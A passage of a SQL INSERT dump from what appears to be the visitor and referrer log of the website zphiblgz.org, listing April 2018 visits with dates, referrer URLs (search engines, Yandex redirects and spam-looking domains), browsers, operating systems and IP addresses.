209.150.108.10','000',1,0),(28827,'2018-04-13','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.108','000',1,0),(28828,'2018-04-13','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(28829,'2018-04-13','https://zphiblgz.org','Safari','iPhone','9.0','','58.248.200.154','000',1,0),(28830,'2018-04-13','https://zphiblgz.org','Safari','iPhone','9.0','','115.192.93.246','000',1,0),(28831,'2018-04-13','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','47.90.213.55','000',1,0),(28832,'2018-04-13','https://zphiblgz.org','Firefox','Windows','40.1','','139.192.147.69','000',2,0),(28833,'2018-04-13','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(28834,'2018-04-13','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(28835,'2018-04-13','http://pornohd1080.online/','MSIE','Windows','6.0','','178.137.164.67','000',2,0),(28836,'2018-04-13','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(28837,'2018-04-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28838,'2018-04-14','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.130.172','000',2,0),(28839,'2018-04-14','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',14,0),(28840,'2018-04-14','https://goodhumor24.com/','Opera','Windows','7.11','','178.137.81.28','000',1,0),(28841,'2018-04-14','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','47.90.213.55','000',1,0),(28842,'2018-04-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.qtucRErkp7YC4ivzg73OHb7S94rGcdeiLrLlcPGOjCA.0ca0effc108a5092885ac1b0895aed479c7816c0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043M1FDQXVmZHdZbzRSZ2FnaVlKd2NFSWQ5bkdMdGRXbGJYcXdYc2JPM3dXZyws&sign=d98dbced6e0d5f7ec2bc14e370774afe&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.108.40','000',2,0),(28843,'2018-04-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.SRGmRLZnz1kVXy8WbP6yL36nU9oUlMknmvoP3RKRLe8.32e478594267f27374ae43c4d276ead2a42a954c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SjFqWU5EaHFlVXR6YWhQM21uZllhX1RIZDgzdE1tcnBHTlV3dE5Vd3Vrdyws&sign=cdab6e51298e74edd6fe0120ea287815&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.199.179','000',2,0),(28844,'2018-04-14','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(28845,'2018-04-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(28846,'2018-04-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1756.q7rhWJmvFcizBnLjPqSznqBNOI7AOmi_3julbZOlPpc.596b36fcb3795f277b2279c737eeb975302b8942&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NDFfRnZNNzMyUk1qQWxqbnMzU2hob3dhcV83S01LY3c2V3RmNGpfbldkZyws&sign=6b228c0033c22ca84e80d2b0f6b6afce&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.181.22','000',2,0),(28847,'2018-04-14','https://zphiblgz.org','Safari','Macintosh','11.0.3','','144.76.168.111','000',1,0),(28848,'2018-04-14','https://zphiblgz.org','wy','Unknown','Unknown','','185.35.63.45','000',1,0),(28849,'2018-04-14','https://zphiblgz.org','fj','Unknown','Unknown','','185.35.63.65','000',1,0),(28850,'2018-04-14','https://beremenyashka.com/','MSIE','Windows','6.0','','178.137.164.67','000',2,0),(28851,'2018-04-14','http://zphiblgz.org/download/constitution-by-laws/','Chrome','Windows','49.0.2623.112','','146.185.223.111','000',1,0),(28852,'2018-04-14','http://zphiblgz.org/','Chrome','Windows','33.0.1750.117','','195.22.125.122','000',3,0),(28853,'2018-04-14','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(28854,'2018-04-14','https://zphiblgz.org','Firefox','Windows','40.1','','93.138.27.21','000',2,0),(28855,'2018-04-14','http://zphiblgz.org/','Firefox','Linux','52.0','','216.169.108.218','000',2,0),(28856,'2018-04-14','https://animenime.ru/','MSIE','Windows','7.0','','46.119.121.74','000',1,0),(28857,'2018-04-14','https://zphiblgz.org','Firefox','Windows','40.1','','121.215.161.229','000',2,0),(28858,'2018-04-14','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(28859,'2018-04-14','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(28860,'2018-04-14','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(28861,'2018-04-14','https://zphiblgz.org','Safari','iPad','11.0','','174.205.23.248','000',4,0),(28862,'2018-04-14','https://www.google.com/','Safari','Macintosh','11.0.3','','71.69.229.243','000',4,0),(28863,'2018-04-14','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.28','000',1,0),(28864,'2018-04-14','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(28865,'2018-04-14','http://03e.info/','Opera','Windows','8.01','','178.159.37.55','000',3,0),(28866,'2018-04-14','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(28867,'2018-04-14','http://prosmibank.ru/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(28868,'2018-04-14','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(28869,'2018-04-14','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(28870,'2018-04-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(28871,'2018-04-14','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(28872,'2018-04-14','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(28873,'2018-04-14','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.31','000',1,0),(28874,'2018-04-14','https://www.google.com/','Safari','Macintosh','11.1','','73.166.99.247','000',2,0),(28875,'2018-04-14','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','108.41.84.235','000',1,0),(28876,'2018-04-14','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','184.94.240.92','000',2,0),(28877,'2018-04-14','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(28878,'2018-04-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(28879,'2018-04-15','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(28880,'2018-04-15','http://sovetogorod.ru/','MSIE','Windows','6.0','','46.119.121.74','000',1,0),(28881,'2018-04-15','https://zphiblgz.org/','Firefox','Windows','30.1','','31.130.4.240','000',2,0),(28882,'2018-04-15','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.4.134','000',2,0),(28883,'2018-04-15','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(28884,'2018-04-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1757.w85wSZYLGpqp9jOneCAQdc3WKeHZjOFNFvhCZtV-XXo.151fd301e3c01e0205b58e6427e7536e93bd2d02&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Yy1RSmRjbUthOHFVdEt2eEY2NGhleXE0SVVyY2ladE5YS3BReHRKX1hKdyws&sign=ffa5241c78955b4c54254737d67438a7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.81.90','000',2,0),(28885,'2018-04-15','https://docsportal.net/','Opera','Windows','8.01','','37.115.112.228','000',1,0),(28886,'2018-04-15','https://docs4all.com/','MSIE','Windows','6.0','','37.115.112.228','000',1,0),(28887,'2018-04-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1758.7d4SQsH2luB6yPiQGCtap-6KKVdcU3lmF7uS2MCt2mQ.cb48c3417772bd7832b842f01fedb39ab1b280f6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Ynk3MENJT1NUSERiZGhpTHBvbXhMWjlwblgxUmNRanhjRmcxSG0xVFJuQSws&sign=168c674679a20fcca4edc31c4e625df2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.24','000',2,0),(28888,'2018-04-15','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1758.-bjQHMV6f2tg1brWC5eFk3px0oyq2hoZufMwMvCSYec.d4c2ccad459af21dd2c51562327628a165c5c19d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SWgxdjFENDljeHI1WjdOMFprenhIbi1US1dGWXE0Ymh2b3BnRF8xMHllUSws&sign=d6586144b96a8a2e48233d917c975d45&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.45.13','000',2,0),(28889,'2018-04-15','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','31.130.4.240','000',2,0),(28890,'2018-04-15','http://komputers-best.ru/','Opera','Windows','8.01','','178.137.81.28','000',2,0),(28891,'2018-04-15','http://pk-services.ru/','MSIE','Windows','6.0','','178.137.81.28','000',2,0),(28892,'2018-04-15','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','166.137.240.126','000',1,0),(28893,'2018-04-15','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','107.77.202.233','000',2,0),(28894,'2018-04-15','https://zphiblgz.org','Firefox','Linux','24.0','','107.77.202.233','000',2,0),(28895,'2018-04-15','https://popugaychiki.com/','MSIE','Windows','6.0','','178.137.164.67','000',3,0),(28896,'2018-04-15','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(28897,'2018-04-15','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(28898,'2018-04-15','https://exdocsfiles.com/','MSIE','Windows','6.0','','178.137.165.1','000',2,0),(28899,'2018-04-15','https://univerfiles.com/','Opera','Windows','7.11','','178.137.165.1','000',3,0),(28900,'2018-04-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(28901,'2018-04-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28902,'2018-04-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.108','000',1,0),(28903,'2018-04-15','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.35','000',1,0),(28904,'2018-04-15','https://zphiblgz.org','MSIE','Windows','10.0','','144.76.162.206','000',1,0),(28905,'2018-04-15','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','62.4.15.41','000',1,0),(28906,'2018-04-15','https://mikozstop.com/','Opera','Windows','8.01','','178.137.165.1','000',2,0),(28907,'2018-04-15','https://www.google.com/','Safari','Macintosh','11.1','','108.40.123.156','000',2,0),(28908,'2018-04-15','https://zphiblgz.org','Chrome','Linux','47.0.2526.35','','51.15.146.186','000',3,0),(28909,'2018-04-15','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(28910,'2018-04-15','http://www.bing.com/search?q=mim+conway+schlorships&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(28911,'2018-04-15','https://www.google.com/','Safari','iPhone','10.0','','98.218.102.15','000',4,0),(28912,'2018-04-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.64','000',1,0),(28913,'2018-04-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.76','000',1,0),(28914,'2018-04-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.81.157.62','000',1,0),(28915,'2018-04-15','https://zphiblgz.org','Firefox','Windows','32.0','','185.81.157.62','000',2,0),(28916,'2018-04-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(28917,'2018-04-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(28918,'2018-04-15','https://zphiblgz.org/','Safari','iPhone','11.0','','100.36.61.191','000',1,0),(28919,'2018-04-15','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(28920,'2018-04-15','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(28921,'2018-04-15','https://www.google.com/','Chrome','Windows','65.0.3325.181','','50.225.39.38','000',3,0),(28922,'2018-04-15','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(28923,'2018-04-15','https://4inn.ru/','Opera','Windows','9.00','','5.248.253.101','000',3,0),(28924,'2018-04-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(28925,'2018-04-15','https://goodhumor24.com/','MSIE','Windows','5.5','','178.137.81.28','000',2,0),(28926,'2018-04-15','https://studentguide.ru/','Opera','Windows','6.0','','178.159.37.55','000',3,0),(28927,'2018-04-15','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(28928,'2018-04-15','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(28929,'2018-04-15','https://www.bing.com/','Edge','Windows','16.16299','','71.246.192.156','000',2,0),(28930,'2018-04-15','https://animenime.ru/','MSIE','Unknown','6.0','','46.119.121.74','000',2,0),(28931,'2018-04-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(28932,'2018-04-15','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(28933,'2018-04-15','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.230','000',1,0),(28934,'2018-04-15','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','94.23.31.164','000',2,0),(28935,'2018-04-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(28936,'2018-04-16','https://zphiblgz.org','Chrome','Windows','46.0.2490.80','','51.15.53.163','000',1,0),(28937,'2018-04-16','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.10.47','000',2,0),(28938,'2018-04-16','http://www.inet-shop.su/','MSIE','Windows','6.0','','46.119.121.74','000',3,0),(28939,'2018-04-16','https://zphiblgz.org','Firefox','Windows','40.1','','42.190.203.222','000',2,0),(28940,'2018-04-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1758.mDbida9n8jgsFf2ofxmpq--ZSb6NQl6mtu8SI40oMtM.0a5ddd90cf74f803cbb732cbc8215525782879f5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Uk9Cby04cWp1SXd2eXNReDdkYTRfYlB5TWlyejlXR1JOZTFsWTI5MWxYUSws&sign=6707dd38ada2389edff78a8f1fd8cca2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.95.157','000',2,0),(28941,'2018-04-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1758.4ydJT2hWJ5koHHD8aEXHcLti4cRMrHvB4JcS4c-SS14.e99cec9b1b8c00962ec9bdb185fad945a51adc75&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042dmNHWVlWNlB4cXAwc25NVGk5YjRDVVVTd2tuNEd5WV9tU3NZSmdtRG5tUSws&sign=61678828040c2d96757ad113cd0070c3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.5.118','000',2,0),(28942,'2018-04-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1759.iWkU8SE55Jt3V9UBvVbFy-0JVu5NHKMiX14q7_iuJ44.5e5419e745591bbc205d3be88cad2cf7423d6673&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QjU0ZmZaNTU4QXJoZlBtVkNkT1ZwUl9uMHlzcUpPMG9KNzFBczUtUWVsQSws&sign=f1881ad332dd10a70dd3652d65f91b77&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.97','000',2,0),(28943,'2018-04-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(28944,'2018-04-16','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(28945,'2018-04-16','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(28946,'2018-04-16','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(28947,'2018-04-16','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(28948,'2018-04-16','http://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','163.172.4.153','000',1,0),(28949,'2018-04-16','https://zphiblgz.org/','Firefox','Windows','53.0','','163.172.4.153','000',1,0),(28950,'2018-04-16','https://zphiblgz.org','Firefox','Macintosh','50.0','','93.152.195.169','000',2,0),(28951,'2018-04-16','https://zphiblgz.org','Firefox','Linux','39.0','','194.183.172.234','000',2,0),(28952,'2018-04-16','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','178.175.45.99','000',2,0),(28953,'2018-04-16','https://zphiblgz.org/','Firefox','Windows','30.0','','31.130.4.240','000',2,0),(28954,'2018-04-16','https://zphiblgz.org/','Firefox','Windows','43.0','','31.130.4.240','000',2,0),(28955,'2018-04-16','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','50.225.39.37','000',2,0),(28956,'2018-04-16','https://zphiblgz.org','Firefox','Macintosh','59.0','','50.225.39.37','000',2,0),(28957,'2018-04-16','https://www.google.com/','Chrome','Macintosh','63.0.3239.108','','50.225.39.61','000',4,0),(28958,'2018-04-16','https://zphiblgz.org','Firefox','Windows','40.1','','177.177.240.49','000',2,0),(28959,'2018-04-16','https://www.google.com/','SamsungBrowser','Android','7.0','','73.129.23.113','000',6,0),(28960,'2018-04-16','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','50.225.39.38','000',16,0),(28961,'2018-04-16','https://search.yahoo.com/','Chrome','Windows','65.0.3325.181','','174.44.104.11','000',2,0),(28962,'2018-04-16','https://www.google.com/','Chrome','Windows','65.0.3325.181','','50.225.39.34','000',3,0),(28963,'2018-04-16','http://healgastro.com/','MSIE','Windows','5.5','','178.137.81.28','000',1,0),(28964,'2018-04-16','https://www.bing.com/','MSIE','Windows','11.0','','162.247.192.3','000',4,0),(28965,'2018-04-16','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=2ahUKEwiMlYyanb_aAhUHoVMKHb1IAcMQjRx6BAgAEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw11nOrxxIIgoFYqZHkUosJu&ust=1523981215727463','MSIE','Windows','11.0','','64.53.103.240','000',2,0),(28966,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.27.206','000',1,0),(28967,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.139.190.57','000',1,0),(28968,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.31.168.195','000',1,0),(28969,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.109.148','000',1,0),(28970,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','198.57.247.151','000',1,0),(28971,'2018-04-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28972,'2018-04-16','https://zphiblgz.org','Safari','Macintosh','11.1','','136.59.233.107','000',6,0),(28973,'2018-04-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(28974,'2018-04-16','http://zphiblgz.org/chaseika/2015/03/post.html','Firefox','Windows','37.1','','213.32.93.218','000',4,0),(28975,'2018-04-16','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.201.94.142','000',4,0),(28976,'2018-04-16','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.236.63.51','000',2,0),(28977,'2018-04-16','https://www.google.com/','Chrome','Windows','65.0.3325.181','','209.183.249.194','000',2,0),(28978,'2018-04-16','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(28979,'2018-04-16','http://03e.info/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28980,'2018-04-16','http://zphiblgz.org/','Firefox','Windows','51.0','','62.106.121.89','000',3,0),(28981,'2018-04-16','https://zphiblgz.org','Firefox','Windows','38.0','','87.126.68.178','000',1,0),(28982,'2018-04-16','http://pk-services.ru/','MSIE','Windows','6.0','','178.137.81.28','000',1,0),(28983,'2018-04-16','https://hoztorg-opt.ru/','MSIE','Windows','3.02','','178.137.81.28','000',1,0),(28984,'2018-04-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28985,'2018-04-16','https://zphiblgz.org','Firefox','Windows','3.5.6','','78.85.203.238','000',1,0),(28986,'2018-04-16','https://zphiblgz.org','Firefox','Windows','54.0','','96.234.210.118','000',1,0),(28987,'2018-04-16','https://zphiblgz.org','Safari','iPad','11.0','','71.166.46.17','000',1,0),(28988,'2018-04-16','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(28989,'2018-04-16','https://krasnodar-avtolombard.ru/','MSIE','Windows','5.5','','178.137.164.67','000',4,0),(28990,'2018-04-16','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(28991,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.229.85.0','000',4,0),(28992,'2018-04-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.188.231','000',4,0),(28993,'2018-04-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(28994,'2018-04-17','https://exdocsfiles.com/','MSIE','Windows','5.5','','178.137.165.1','000',1,0),(28995,'2018-04-17','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.58.249','000',2,0),(28996,'2018-04-17','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(28997,'2018-04-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(28998,'2018-04-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(28999,'2018-04-17','https://infodocsportal.com/','MSIE','Windows','6.0','','178.137.165.1','000',2,0),(29000,'2018-04-17','http://zphiblgz.org/contact/','Chrome','Windows','62.0.3202.94','','137.74.132.80','000',4,0),(29001,'2018-04-17','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',13,0),(29002,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1759.6ryzy4RXnp_EQL820wwaSD_qJCyJVBF9H2JBduQGIzE.4b63290b46600bd9343dd017e6e9f9ec1ca23240&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Nzdja2JXbHFpR2RNVlI1dmMzUDVPSTdjRXUxZW0ySFJrRnl6eGc3TVlFQSws&sign=d0467644f7f8fd3d6388a4ccc45a60b4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.4.81','000',2,0),(29003,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1759.39fOtWCAJYqzEtDubOYrCobvetNWqTtmmaeXb4rWKOU.88c2f00b3f6a1efe3b109c9d21c08130553c6c4a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dXhNc2hYRm0zQUtXNXZ5LVFQWHEwelBWYm9RMHZ0ZjBxMko2QzIxSWljUSws&sign=df8fa66ba8fe15d42e6e12ce54758a6c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.193.57.165','000',2,0),(29004,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1759.wHC3FJjdf6r1PnvIHhGwcErXUrqEi-gRNEsl6tzdHZs.c594c837b889093ca6c716f9548501a744f65f4c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040dVhNZk1nV3VYZUNKN3FCbFh4LTlCU2JKdi1JRkdLdS1yOTFHR2Q2NXctZyws&sign=b804d234b9538a6c85b39579937fa057&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.232.95','000',2,0),(29005,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1759.XRlhG8jSLV7H66v_7mo_2NXDp5JeENRZpa40OMQMMu4.1187b512037eca3fdc56d62de28ee4b37b19e239&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041V1A1MUV3YTdBTVNfM2lzRmNoenRoNkJqRWtVS09tQng3N2lYRWE1M2I4USws&sign=aa2291e68655fb777cd5be2f076f5c90&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.217.84','000',2,0),(29006,'2018-04-17','https://zphiblgz.org','Firefox','Windows','40.1','','182.55.30.164','000',2,0),(29007,'2018-04-17','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','73.172.63.178','000',3,0),(29008,'2018-04-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1760.9OZoUM1IqFvKqxAhSMkpkY5KW2DPpYaWx1JmbaYiI4Y.1b79bbfbd133e23eed50fe1170c3e59fa1eb723d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2S